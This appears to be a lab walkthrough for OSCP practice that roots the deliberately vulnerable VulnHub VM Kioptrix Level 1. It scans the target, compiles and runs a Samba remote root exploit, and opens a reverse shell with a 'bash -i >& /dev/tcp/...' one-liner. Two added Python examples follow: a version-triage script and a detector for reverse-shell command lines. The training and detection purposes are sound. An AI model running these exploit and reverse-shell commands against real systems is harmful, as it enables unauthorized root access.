My OSCP exam is fast approaching. For extra practice I am going to start working through the relevant vulnhub machines.
A list of VulnHub machines that are more like the OSCP is here.
Starting right at the beginning with: Kioptrix Level 1
I used the free VMware Workstation edition and created a new private network. I moved my Kali machine and Kioptrix into that network. (I also have a basic DHCP/DNS server in there.)
Starting with a scan to find the machine:
netdiscover -r 10.0.0.0/24
Nmap scan of our discovered target:
nmap -p- -sV -sS -T4 -A 10.0.0.51
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      1 (RPC #100024)
We seem to have:
OpenSSH 2.9
HTTP & HTTPS
RPC & SMB (via Samba)
Starting a quick scan of the HTTP and SMB ports via dirb and enum4linux to build out the list of possible attack surfaces:
The most interesting thing in the scan is the version of Samba.
The latest on the Samba site is 4.7.0. The version on this server is 2.2.1a, which looks really old. Looking at the Samba site, this version was from 2001 and was designed with Windows 2000 enhancements in mind.
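The version triage above (reading the nmap service table, then comparing what enum4linux reports for Samba against the current release) is the kind of thing worth scripting when you do it for more than one host. The following is an added example, not code from the original post: it parses the nmap `-sV` table embedded inline, merges in the Samba version that enum4linux reported (the nmap banner only says "Samba smbd"), and flags every product whose version is behind a reference version. The Samba reference (4.7.0) is the figure quoted above; the Apache httpd and OpenSSH references are assumed placeholder values that should be refreshed from the vendors' release pages before the output is relied on.

```python
import re

# Constructed sample: the nmap -sV service table from the scan above,
# embedded inline so the script runs offline.
NMAP_OUTPUT = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      1 (RPC #100024)
"""

# Version reported by enum4linux for the SMB service, keyed by port so it can
# be merged with the nmap table (nmap's banner carries no Samba version).
ENUM4LINUX_VERSIONS = {"139/tcp": "Samba 2.2.1a"}

# Reference versions to compare against. Samba 4.7.0 is the figure quoted in
# the post; the Apache httpd and OpenSSH entries are ASSUMED placeholders.
REFERENCE_VERSIONS = {
    "Samba": (4, 7, 0),
    "Apache httpd": (2, 4),
    "OpenSSH": (7, 6),
}

# One regex per product: the product name followed by a dotted version.
PRODUCT_RE = {
    name: re.compile(r"\b" + re.escape(name) + r"\s+(\d+(?:\.\d+)+)")
    for name in REFERENCE_VERSIONS
}

# One row of nmap's normal-output service table.
NMAP_LINE_RE = re.compile(
    r"^(?P<port>\d+/(?:tcp|udp))\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_nmap_services(text):
    """Return {port: {service, version}} for every open port in the table."""
    services = {}
    for line in text.splitlines():
        m = NMAP_LINE_RE.match(line)
        if m and m.group("state") == "open":
            services[m.group("port")] = {
                "service": m.group("service"),
                "version": m.group("version").strip(),
            }
    return services


def version_tuple(text):
    """'1.3.20' -> (1, 3, 20) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def triage(nmap_text, extra_versions):
    """Merge extra banners into the nmap table and flag products behind reference."""
    services = parse_nmap_services(nmap_text)
    for port, banner in extra_versions.items():
        if port in services:
            services[port]["version"] = banner + " " + services[port]["version"]

    findings = []
    for port, info in sorted(services.items(), key=lambda kv: int(kv[0].split("/")[0])):
        for product, rx in PRODUCT_RE.items():
            m = rx.search(info["version"])
            if not m:
                continue
            found = version_tuple(m.group(1))
            ref = REFERENCE_VERSIONS[product]
            findings.append({
                "port": port,
                "product": product,
                "version": m.group(1),
                "behind_reference": found < ref,
                "major_versions_behind": ref[0] - found[0],
            })
    return findings


if __name__ == "__main__":
    for f in triage(NMAP_OUTPUT, ENUM4LINUX_VERSIONS):
        flag = "OUTDATED" if f["behind_reference"] else "ok"
        print(f"{f['port']:<9} {f['product']:<13} {f['version']:<8} "
              f"{flag} ({f['major_versions_behind']} major versions behind)")
```

Run as-is, it lists OpenSSH on 22, Apache httpd on 80 and 443, and Samba on 139, all flagged as behind the reference; the `major_versions_behind` column is the quick signal that Samba is two major releases back, which is why it is the first place to look.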
Quick manual check of the interesting pages:
At this point we have a handful of attack surfaces to explore:
- Old Samba (2.2.1)
- Oldish Apache (Apache httpd 1.3.20)
- Webalizer 2.01
The really old samba is particularly interesting, starting there:
searchsploit samba 2.2
Remote root exploit sounds perfect. Inspecting the code to see if there is any manual work to do: it seems to be ready to go as-is.
Compiled with: gcc 10.c -o sambaexploit
Execute with: ./sambaexploit -b 0 -v 10.0.0.51
It seems to have worked. We don't have an interactive shell (tried an ls command), but we appear to be able to execute commands.
Set up a local listener: nc -nlvp 443
Execute reverse shell via the exploit prompt: bash -i >& /dev/tcp/10.0.0.50/443 0>&1
Success – interactive reverse shell (as root):
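From the defender's side, the `bash -i >& /dev/tcp/...` one-liner used above is a very recognisable pattern in process-execution telemetry, and it is worth having a rule that tells it apart from the legitimate `/dev/tcp` connectivity checks that admin scripts sometimes use. The following is an added example, not part of the original post: it runs a small classifier over constructed command-line records (the shape a host agent or auditd EXECVE summary would give you) and rates each `/dev/tcp` use by whether the command's output is redirected into the socket and whether the shell is interactive.

```python
import re

# Constructed sample of process-execution records. Record 4101 is the reverse
# shell from the walkthrough; 4103 is a benign port check; the rest are noise.
SAMPLE_EVENTS = [
    {"pid": 4101, "user": "root", "cmdline": "bash -i >& /dev/tcp/10.0.0.50/443 0>&1"},
    {"pid": 4102, "user": "apache", "cmdline": "/usr/sbin/httpd -DSSL"},
    {"pid": 4103, "user": "bob", "cmdline": "timeout 2 bash -c '</dev/tcp/10.0.0.51/22' && echo open"},
    {"pid": 4104, "user": "bob", "cmdline": "curl http://10.0.0.50/healthz"},
]

# A /dev/tcp or /dev/udp pseudo-device path with its destination host and port.
DEV_TCP_RE = re.compile(r"/dev/(?P<proto>tcp|udp)/(?P<host>[0-9A-Za-z.\-:]+)/(?P<port>\d+)")
# stdout and/or stderr redirected into the socket (>&, &>, >, 2>).
OUTPUT_TO_SOCKET_RE = re.compile(r"(?:>&|&>|\d?>)\s*/dev/(?:tcp|udp)/")
# An interactive shell (bash -i, sh -i, ...) or stdin duplicated from the socket.
INTERACTIVE_RE = re.compile(r"\b(?:ba|z|da)?sh\s+-i\b|0[<>]&1")


def classify(cmdline):
    """Return None for commands without /dev/tcp, else a dict with a severity."""
    m = DEV_TCP_RE.search(cmdline)
    if not m:
        return None
    to_socket = bool(OUTPUT_TO_SOCKET_RE.search(cmdline))
    interactive = bool(INTERACTIVE_RE.search(cmdline))
    if to_socket and interactive:
        severity, label = "high", "interactive reverse shell"
    elif to_socket:
        severity, label = "medium", "command output redirected to a socket"
    else:
        severity, label = "low", "socket opened (possible connectivity check)"
    return {
        "dest": (m.group("host"), int(m.group("port"))),
        "proto": m.group("proto"),
        "severity": severity,
        "label": label,
    }


def scan_events(events):
    """Run classify() over every record and attach pid/user to each alert."""
    alerts = []
    for ev in events:
        verdict = classify(ev["cmdline"])
        if verdict:
            alerts.append({"pid": ev["pid"], "user": ev["user"], **verdict})
    return alerts


if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        host, port = a["dest"]
        print(f"[{a['severity']:<6}] pid={a['pid']} user={a['user']} "
              f"-> {host}:{port}/{a['proto']}  {a['label']}")
```

The listener port in the walkthrough is 443, chosen so the outbound connection looks like ordinary HTTPS; the command line, not the destination port, is what gives it away, which is why a process-level rule like this catches what a port-based egress filter would wave through.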